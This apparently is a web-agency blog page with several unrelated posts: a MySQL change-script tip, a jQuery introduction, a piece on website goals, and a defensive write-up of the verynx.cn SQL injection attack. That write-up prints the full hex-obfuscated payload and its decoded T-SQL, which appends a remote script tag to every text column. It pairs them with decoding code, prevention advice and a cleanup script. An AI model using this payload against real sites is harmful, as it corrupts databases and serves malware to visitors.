
Generate Change Script for MySQL Modifications

After reading a blog post called “Generate Change Script for SQL Modifications” for SQL Server Management Studio, we wanted to show how to do the same task for MySQL using the MySQL Query Browser.

  1. Open the Query Browser and right click on the table you need to modify.
  2. Select Edit Table from the context menu. You will be presented with the MySQL Table Editor, which gives you a graphical interface for modifying your table structure.
  3. Modify the table in whatever way you wish.

    Some examples…
    - change field names, types, defaults
    - add indices, foreign keys
    - change the character sets and collation
    - change the auto increment value

  4. Click Apply Changes at the bottom of the window. You will be presented with a confirmation box; the changes have NOT been executed yet. What’s great is that it shows you the exact SQL it will run to modify the table.
  5. Use your cursor to select the code and then copy it into whatever text editor you prefer.

Now you have an SQL script that can be executed on multiple servers or further modified by hand. Review it before running it elsewhere: the generated ALTER TABLE statements assume the target table currently has the same structure as the one you edited.


SQL Injection Hack using CAST from 1.verynx.cn

Update

If the attack has changed to a different URL, simply replace the URL in the solution script below (assuming the rest of the syntax has not changed).

Hope that helps.


A new SQL injection attack is circulating from verynx.cn. It hides its payload as a hex literal that is CAST to CHAR(4000) and then run with EXEC; the decoded payload appends some HTML garbage, including a reference to a JavaScript file on the verynx.cn domain, to every text column of every table, so that visitors to your website load that script. Luckily the domain serving the script now resolves to 127.0.0.1, which helps stop the malware spreading. Unfortunately the botnet still seems to be spamming websites with the scripted attack, leaving many entirely broken or extremely slow to load, since each page can end up carrying hundreds of requests for the injected script.

The attack works like this:

Suppose you have a web page like www.mywebsite.com/showproducts.aspx?categoryId=12. An attacker visits your website with SQL appended to the number 12, for example www.mywebsite.com/showproducts.aspx?categoryId=12;SELECT * from tblProducts;. If the page concatenates categoryId into its query, the database runs the attacker’s statement right after yours (a stacked query); here the attacker is guessing at a table name and hoping the results get echoed back to them. Below is the far more elaborate version of the same idea: the statements are hidden as a hex literal, CAST converts it into a string, and your SQL Server executes that string with EXEC.

Sample of Attack:

;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535
292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220
435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D2073797
36F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420
616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747
970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50
454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F4
37572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D30
2920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432
B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D226874
74703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D2727207
76865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C73637269
7074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970
743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F722
0494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C
4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);

Un-Obfuscated Attack:

;DECLARE @T varchar(255),@C varchar(4000)
DECLARE Table_Cursor CURSOR FOR
    select a.name,b.name from sysobjects a,syscolumns b
    where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
    exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://1.verynx.cn/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://1.verynx.cn/w.js"></script><!--''')
    FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
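To get from the raw request to the readable statement above without doing it by hand, here is an added Python example (not code from the original post): it URL-decodes a query string, pulls out every CAST(0x... AS CHAR(n)) hex blob, decodes it, and lists the script URLs the payload would write into the database. It goes slightly beyond the attack shown here in that it also handles the NCHAR/NVARCHAR variant, which SQL Server decodes as UTF-16LE. SAMPLE_QUERY is constructed from the hex blob above; the regex and function names are this example’s own.

```python
import re
from urllib.parse import unquote

# Constructed sample: the query string of the captured attack above, with the
# hex blob joined onto one line. Only the query-string part of the URL is needed.
SAMPLE_QUERY = (
    "categoryId=12;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x"
    "4445434C415245204054207661726368617228323535"
    "292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220"
    "435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D2073797"
    "36F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420"
    "616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747"
    "970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50"
    "454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F4"
    "37572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D30"
    "2920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432"
    "B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D226874"
    "74703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D2727207"
    "76865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C73637269"
    "7074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970"
    "743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F722"
    "0494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C"
    "4F43415445205461626C655F437572736F72"
    "%20AS%20CHAR(4000));EXEC(@S);"
)

# CAST(0x<hex> AS CHAR(n)) and the NCHAR/NVARCHAR variant. The type name decides
# whether the bytes are single-byte text or UTF-16LE (what SQL Server uses for N types).
CAST_BLOB = re.compile(
    r"CAST\(\s*0x([0-9A-Fa-f]+)\s+AS\s+(N?(?:VAR)?CHAR)\s*\(\s*\d+\s*\)\s*\)",
    re.IGNORECASE,
)
SCRIPT_SRC = re.compile(r'<script\s+src="([^"]+)"', re.IGNORECASE)


def decode_cast_payloads(raw_query: str) -> list[str]:
    """Return the plaintext of every CAST(0x... AS [N]CHAR(n)) blob in a query string."""
    query = unquote(raw_query)  # %20 -> space etc.; the hex digits themselves are not encoded
    payloads = []
    for match in CAST_BLOB.finditer(query):
        hexblob, typename = match.group(1), match.group(2).upper()
        if len(hexblob) % 2:
            # A dropped hex digit (common in copied logs) shifts every later byte;
            # report it instead of decoding garbage.
            raise ValueError(
                f"odd-length hex blob ({len(hexblob)} digits) at offset {match.start()}"
            )
        raw = bytes.fromhex(hexblob)
        encoding = "utf-16-le" if typename.startswith("N") else "latin-1"
        payloads.append(raw.decode(encoding))
    return payloads


def script_sources(sql_text: str) -> list[str]:
    """Unique <script src=...> URLs the decoded payload would inject."""
    seen = []
    for url in SCRIPT_SRC.findall(sql_text):
        if url not in seen:
            seen.append(url)
    return seen


if __name__ == "__main__":
    for sql in decode_cast_payloads(SAMPLE_QUERY):
        print(sql)
        print("injects:", script_sources(sql))
```

Run it on the query string from your IIS or web server log (the part after the `?`); the printed statement is what EXEC(@S) ran on your server, and the URL list tells you which string to search for in your tables.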

Tips to prevent SQL Injection Hacks:

Do not trust user data. The easiest fix for most SQL injection problems is to validate all incoming data and hand it to the database as query parameters rather than concatenating it into SQL text. For any kind of number or ID this is easy: make sure the incoming value converts cleanly to a number (an int, for example), or, for other IDs such as GUIDs, to a GUID, before it goes anywhere near the database.

Another simple fix: connect to the database with a least-privilege login. If the application doesn’t need to execute stored procedures or dynamic SQL, don’t grant it EXECUTE; and a login that can only SELECT from the product tables can’t run the UPDATEs this payload issues.
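As an added illustration of both tips (example code, not from the original post): a Python script using sqlite3 that contrasts a lookup built by string concatenation with one that validates categoryId as an integer and binds it as a query parameter. The products table, the ATTACK_ID payload (a stacked UPDATE in the shape of the real one, since SQLite has no CAST(0x... AS CHAR) to hide it behind) and all function names are constructed for the demo; executescript stands in for a driver that, like ADO.NET against SQL Server, runs every statement in the batch.

```python
import sqlite3

# Constructed payload in the shape the page describes: a second statement stacked
# after the numeric categoryId. The tag is the one the real attack appends.
INJECTED_TAG = '"></title><script src="http://1.verynx.cn/w.js"></script><!--'
ATTACK_ID = "12;UPDATE products SET name = name || '" + INJECTED_TAG + "';"

LOOKUP_SQL = "SELECT id, name FROM products WHERE category_id = "


def fresh_db() -> sqlite3.Connection:
    """In-memory products table with a few constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE products(id INTEGER PRIMARY KEY, category_id INTEGER, name TEXT);"
        "INSERT INTO products(category_id, name) VALUES (12,'Widget'),(12,'Gadget'),(7,'Gizmo');"
    )
    return conn


def vulnerable_products(conn: sqlite3.Connection, raw_category_id: str) -> None:
    """Concatenates the raw parameter into the SQL text and runs the result as a batch.
    executescript runs every statement it is handed, so the stacked UPDATE executes too."""
    conn.executescript(LOOKUP_SQL + raw_category_id)


def parse_id(raw: str) -> int:
    """Accept only a plain non-negative integer; anything else never reaches the database."""
    if not raw.isdigit():
        raise ValueError(f"categoryId is not an integer: {raw!r}")
    return int(raw)


def safe_products(conn: sqlite3.Connection, raw_category_id: str) -> list:
    """Validate first, then bind the value as a parameter so it is data, never SQL."""
    category_id = parse_id(raw_category_id)
    return conn.execute(LOOKUP_SQL + "? ORDER BY id", (category_id,)).fetchall()


def param_only_products(conn: sqlite3.Connection, raw_category_id: str) -> list:
    """Binding alone, without type validation: the payload is compared as a string,
    matches nothing, and no second statement can run."""
    return conn.execute(LOOKUP_SQL + "? ORDER BY id", (raw_category_id,)).fetchall()


def tampered_rows(conn: sqlite3.Connection) -> int:
    """How many product names now carry the injected script tag."""
    return conn.execute(
        "SELECT count(*) FROM products WHERE name LIKE '%verynx.cn/w.js%'"
    ).fetchone()[0]


def demo() -> dict:
    conn = fresh_db()
    vulnerable_products(conn, ATTACK_ID)
    after_vulnerable = tampered_rows(conn)  # every row rewritten

    conn = fresh_db()
    try:
        safe_products(conn, ATTACK_ID)
        rejected = False
    except ValueError:
        rejected = True
    return {
        "tampered_after_vulnerable": after_vulnerable,
        "attack_rejected_by_validation": rejected,
        "param_only_rows": param_only_products(conn, ATTACK_ID),  # [] and nothing tampered
        "tampered_after_safe": tampered_rows(conn),
        "legit_lookup": safe_products(conn, "12"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The type check and the parameter binding protect independently: validation rejects the request before any query is built, and binding makes the value inert even if validation is forgotten on some page. Use both; the int conversion also gives you a clean 400 error instead of a database exception.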

Solution (Fixing your database after the attack):

Here we turn their code into the solution: the same cursor loops through every character column of every user table and strips what they inserted. Take a backup before running it. Note that REPLACE does not accept text or ntext arguments (xtype 35 and 99); on SQL Server 2005 and later wrap those columns in CAST(... AS varchar(max)) or nvarchar(max), and if the attacker’s URL differs from the one below, change it in the string.

DECLARE @T varchar(255),@C varchar(4000)
-- every character column of every user table: 99=ntext, 35=text, 231=nvarchar, 167=varchar
DECLARE Table_Cursor CURSOR FOR
    select a.name,b.name from sysobjects a,syscolumns b
    where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
    -- remove the injected tag from the current column; replace the URL if theirs differs
    exec('update ['+@T+'] set ['+@C+']=replace(['+@C+'],''"></title><script src="http://1.verynx.cn/w.js"></script><!--'','''')')
    FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

Additional Links:

All the details you need to understand SQL Injection: http://en.wikipedia.org

SQL Injection Cheat Sheet: http://ferruh.mavituna.com

SQL Injection Attack Detection Tools: http://52coding.com

Essential Security Considerations: http://nettuts.com

PHP+Mysql tips for preventing SQL injections: http://www.johnrockefeller.net

What to do if you’re still stuck:

Post your questions in the comments below and we will answer them as quickly as possible – also if anyone has any useful information we will update the article to share that information with others.


jQuery – What is it & How to get started

One of our favorite new tools of the last year has to be jQuery, and we recently came across a great article that should help any developer unfamiliar with it get their hands and feet wet.

What is jQuery?
jQuery is an extremely robust library that helps you code more efficiently and get more done with less work. (Honestly, who would rather do more work when they can do less and achieve the same result?) The key features of jQuery are its use of CSS selectors to find elements and its chaining: most jQuery methods return the jQuery object you called them on, so calls can be strung together. Oh, and did we mention it also handles cross-browser compatibility issues for you?

Check out this article from NETTUTS to get your feet wet and unleash the power of jQuery.


Why do you need a website?

“Why do you need a website?”

In this second blog post based on our Techalliance workshop on (re)designing corporate websites, we explore the first question we always ask our clients. It seems obvious, but you’d be surprised how many companies don’t have a clear answer prepared, which is interesting because the answer to this question is the foundation that informs every design, implementation and technology decision in the website creation process. Your website exists to help you achieve your goals, and defining what you want to accomplish is the first step in creating a site that works for you.

There are a lot of competing technologies and approaches in web design, and having a clear goal for your website is the best way to narrow the choices you’ll be making. Designing a website is a lot like reaching for a tool from a giant toolbox – you have to pick the right tool for the job. If you are trying to screw two pieces of wood together a hammer is a poor choice compared to a screwdriver. The requirements for a website that sells products are vastly different from an informational brochure site that simply serves to introduce the world to your company and brand.
